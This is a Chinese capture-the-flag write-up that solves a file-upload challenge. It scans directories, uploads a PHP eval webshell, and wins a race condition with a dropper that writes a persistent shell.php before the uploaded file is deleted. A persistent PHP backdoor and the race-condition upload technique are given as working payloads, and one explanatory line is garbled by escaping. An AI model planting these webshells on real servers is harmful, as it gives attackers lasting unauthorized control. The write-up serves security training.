攻防世界——wzsc_文件上传

拿到靶机后有一个文件上传界面

随便传个文本看看有什么返回

上传后页面跳转到upload.php

但这里什么也没有

用dirsearch扫一下

发现有一个flag.php文件,并且还有一个upload目录

访问flag.php文件

也是什么都没有

访问upload目录

发现了我们刚刚上传的文本

那就说明文件上传的路径在upload目录下

写一句话木马上传

复制代码
<?php @eval($_POST['rc'];?>

上传成功

但是找不到文件

猜测是文件在上传之后就被删除了

这里我们可以利用条件竞争漏洞进行文件上传

服务器处理代码时总会存在一定的时间差 ,当我们在上传文件后就多次快速尝试访问目标文件,那么是不是有机会在删除前成功访问文件。而如果文件的代码是重新创建一个木马文件,新木马文件则永远不会被删除了!

构造木马

复制代码
<?php fputs(fopen("shell.php", "w"), '<?php @eval($_POST["shell"]); ?>'); ?>

直接使用<?php @eval(_POST\["shell"\]); ?\>的Webshell会随着原始文件被删除而失效。而通过fopen/fputs方式: **\_POST["shell"]); ?>'); ?>**

这段代码会在服务器上创建一个全新的、独立的文件,不受原始上传文件生命周期的影响,提供持久化的后门访问。

构造条件竞争进程

首先,需要设置两个,一个为上传包进程,一个为访问包进程,

只要在没有被删除前访问到木马文件就可以上传一句话木马。

其中访问进程需大于上传进程。

构造上传进程

构造上传post地址池,并发线程为30

构造上传程序

勾选一个影响不大的东西,这里勾选的东西需要确保置换为空时不产生影响的

构造访问进程

构造访问require地址池,并发线程为50

成功了

蚁剑访问

相关推荐
CDN3607 小时前
360CDN SDK 游戏盾:轻量化接入 + 强防护实测
运维·游戏·网络安全
hzhsec8 小时前
MSF-CobaltStrike实现内网socks代理转发上线
服务器·网络·安全·网络安全
mygljx9 小时前
MySQL 数据库连接池爆满问题排查与解决
android·数据库·mysql
xinhuanjieyi10 小时前
ruoyimate导入sql\antflow\bpm_init_db.sql报错
android·数据库·sql
闲猫11 小时前
基于RABC的权限控制设计
android
CDN36014 小时前
低成本游戏防护:360 SDK 游戏盾使用总结
运维·游戏·网络安全
星霜笔记14 小时前
GitMob — 手机端 GitHub 管理工具
android·kotlin·github·android jetpack
LiuYaoheng14 小时前
问题记录:Android Studio Low memory
android·ide·android studio
Chockmans15 小时前
春秋云境CVE-2021-46436
web安全·网络安全·春秋云境·cve-2021-46436
独隅15 小时前
Python 标准库 (Standard Library) 全面使用指南
android·开发语言·python